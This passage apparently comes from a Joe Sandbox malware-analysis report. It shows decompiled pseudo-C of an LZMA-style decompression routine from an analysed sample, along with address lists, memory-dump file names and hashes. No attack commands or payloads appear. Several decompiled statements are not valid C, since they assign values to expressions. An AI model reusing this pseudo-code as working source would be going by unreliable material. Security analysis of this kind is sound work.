													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406409
0x00406409
0x0040640d
0x0040641a
0x00406424
0x00000000
0x0040640f
0x0040640f
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x0040640d

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
